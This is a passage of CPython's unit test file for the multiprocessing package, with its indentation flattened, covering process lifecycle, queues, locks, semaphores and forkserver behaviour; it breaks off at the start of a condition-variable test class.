connection.close()
if __name__ == "__main__":
main()
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
from test.support import hashlib_helper
from test.support import socket_helper
from test.support import threading_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
    # Since multiprocessing.Process has the same API as threading.Thread
    # (join() and is_alive()), the support function can be reused
threading_helper.join_thread(process)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
        # process cannot shut down until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
                # qsize is not available on all platforms as it
# relies on sem_getvalue
pass
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
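# The classes below exercise the synchronization primitives (Lock, RLock,
# Semaphore, BoundedSemaphore, Condition, Event) across the 'processes',
# 'manager' and 'threads' back ends selected via self.TYPE.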
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
        # Currently fails on OS X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
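# _TestCondition uses two counting semaphores as a handshake: each worker
# releases 'sleeping' once it is waiting on the condition and releases 'woken'
# once it has been notified, so get_value() on them tracks progress.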
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
